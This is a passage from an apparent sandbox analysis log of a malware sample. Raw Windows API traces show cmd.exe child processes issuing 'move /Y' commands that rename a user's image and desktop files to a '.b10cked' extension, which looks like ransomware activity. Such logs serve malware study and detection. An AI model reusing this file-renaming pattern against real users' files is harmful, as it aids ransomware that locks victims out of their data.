_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.787] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.787] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.787] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.787] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.787] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.787] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.787] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.789] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f18c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f184, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f184*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.789] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.789] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.790] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.790] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.790] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.790] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0141.790] _wcsicmp (_String1="m41m.jpg", _String2=".") returned 63 [0141.790] _wcsicmp (_String1="m41m.jpg", _String2="..") returned 63 [0141.790] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg")) returned 0x20 [0141.790] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x231d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.790] SetErrorMode (uMode=0x0) returned 0x0 [0141.790] SetErrorMode (uMode=0x1) returned 0x0 [0141.790] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", nBufferLength=0x104, lpBuffer=0x20eb14, lpFilePart=0x20eafc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", lpFilePart=0x20eafc*="m41m.jpg") returned 0x21 [0141.790] SetErrorMode (uMode=0x0) returned 0x1 [0141.790] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.790] _wcsicmp (_String1="m41m.jpg", _String2=".") returned 63 [0141.790] _wcsicmp (_String1="m41m.jpg", _String2="..") returned 63 [0141.791] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg")) returned 0x20 [0141.791] SetErrorMode (uMode=0x0) returned 0x0 [0141.791] SetErrorMode (uMode=0x1) returned 0x0 [0141.791] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", nBufferLength=0x104, lpBuffer=0x20ef90, lpFilePart=0x20ed28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", lpFilePart=0x20ed28*="m41m.jpg") returned 0x21 [0141.791] SetErrorMode (uMode=0x0) returned 0x1 [0141.791] SetErrorMode (uMode=0x0) returned 0x0 [0141.791] SetErrorMode (uMode=0x1) returned 0x0 [0141.791] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x20f198, lpFilePart=0x20ed28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked", 
lpFilePart=0x20ed28*="m41m.jpg.b10cked") returned 0x29 [0141.791] SetErrorMode (uMode=0x0) returned 0x1 [0141.791] SetLastError (dwErrCode=0x0) [0141.791] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg.b10cked")) returned 0xffffffff [0141.791] GetLastError () returned 0x2 [0141.791] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", fInfoLevelId=0x1, lpFindFileData=0x20e6a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e6a4) returned 0x232198 [0141.791] FindNextFileW (in: hFindFile=0x232198, lpFindFileData=0x20e6a4 | out: lpFindFileData=0x20e6a4) returned 0 [0141.792] GetLastError () returned 0x12 [0141.792] FindClose (in: hFindFile=0x232198 | out: hFindFile=0x232198) returned 1 [0141.792] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", fInfoLevelId=0x1, lpFindFileData=0x231ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x231ac8) returned 0x232198 [0141.793] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x20e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked", lpFilePart=0x0) returned 0x29 [0141.793] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", nBufferLength=0x104, lpBuffer=0x20e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", lpFilePart=0x0) returned 0x21 [0141.793] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg")) returned 0x20 [0141.793] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg.b10cked"), dwFlags=0x3) returned 1 [0141.793] FindClose 
(in: hFindFile=0x232198 | out: hFindFile=0x232198) returned 1 [0141.793] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e8f0 | out: _Buffer=" 1") returned 9 [0141.793] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.793] GetFileType (hFile=0x7) returned 0x2 [0142.274] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.274] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e87c | out: lpMode=0x20e87c) returned 1 [0142.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.275] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e8b0 | out: lpConsoleScreenBufferInfo=0x20e8b0) returned 1 [0142.275] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.275] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e8f0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.275] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e8d4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e8d4*=0x1a) returned 1 [0142.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.275] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.276] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.276] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.276] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.276] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.276] SetConsoleInputExeNameW () returned 0x1 [0142.276] GetConsoleOutputCP () returned 0x1b5 [0142.276] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.276] SetThreadUILanguage (LangId=0x0) 
returned 0x409 [0142.276] exit (_Code=0) Process: id = "179" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e80" os_pid = "0xfa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15130 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15131 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15132 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15133 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 15134 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15135 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15136 start_va = 
0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15137 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15138 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 15139 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15974 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15975 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15976 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15977 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 15978 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 15979 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15980 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15981 start_va = 
0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15982 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15983 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15984 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15985 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15986 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15987 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15988 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 15989 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15990 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" 
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15991 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15992 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15993 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15994 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15995 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 15996 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 15997 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 236 os_tid = 0xefc [0141.555] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd2c | out: lpSystemTimeAsFileTime=0x22fd2c*(dwLowDateTime=0x8e4eb300, dwHighDateTime=0x1d440a9)) [0141.555] GetCurrentProcessId () returned 0xfa4 [0141.555] GetCurrentThreadId () returned 0xefc [0141.555] GetTickCount () returned 0x2c5dd [0141.555] QueryPerformanceCounter (in: lpPerformanceCount=0x22fd24 | out: lpPerformanceCount=0x22fd24*=19834457994) returned 1 [0141.556] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.556] __set_app_type (_Type=0x1) [0141.556] __p__fmode () returned 0x76b331f4 [0141.556] __p__commode () returned 0x76b331fc [0141.556] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.556] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.556] GetCurrentThreadId () returned 0xefc [0141.556] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xefc) returned 0x38 [0141.556] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.556] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.556] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.557] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fcbc | out: phkResult=0x22fcbc*=0x0) returned 0x2 [0141.557] VirtualQuery (in: lpAddress=0x22fcf3, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.557] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.557] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.557] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.557] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fc8c, dwLength=0x1c | out: lpBuffer=0x22fc8c*(BaseAddress=0x230000, AllocationBase=0x230000, 
AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.557] GetConsoleOutputCP () returned 0x1b5 [0141.557] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.557] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.557] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.557] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.557] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.558] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.558] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.558] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.558] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.558] GetEnvironmentStringsW () returned 0x330178* [0141.558] FreeEnvironmentStringsW (penv=0x330178) returned 1 [0141.558] GetEnvironmentStringsW () returned 0x330178* [0141.558] FreeEnvironmentStringsW (penv=0x330178) returned 1 [0141.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec2c | out: phkResult=0x22ec2c*=0x40) returned 0x0 [0141.558] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0xa0, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.558] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x1, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x1, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x0, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x40, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x40, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x40, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegCloseKey (hKey=0x40) returned 0x0 [0141.559] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec2c | out: phkResult=0x22ec2c*=0x40) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x40, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x1, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec34, 
lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x1, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x0, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x9, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x4, lpData=0x22ec38*=0x9, lpcbData=0x22ec30*=0x4) returned 0x0 [0141.559] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec34, lpData=0x22ec38, lpcbData=0x22ec30*=0x1000 | out: lpType=0x22ec34*=0x0, lpData=0x22ec38*=0x9, lpcbData=0x22ec30*=0x1000) returned 0x2 [0141.559] RegCloseKey (hKey=0x40) returned 0x0 [0141.559] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.559] srand (_Seed=0x5b886370) [0141.559] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"" [0141.559] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"" [0141.559] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.559] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.560] GetEnvironmentVariableW (in: 
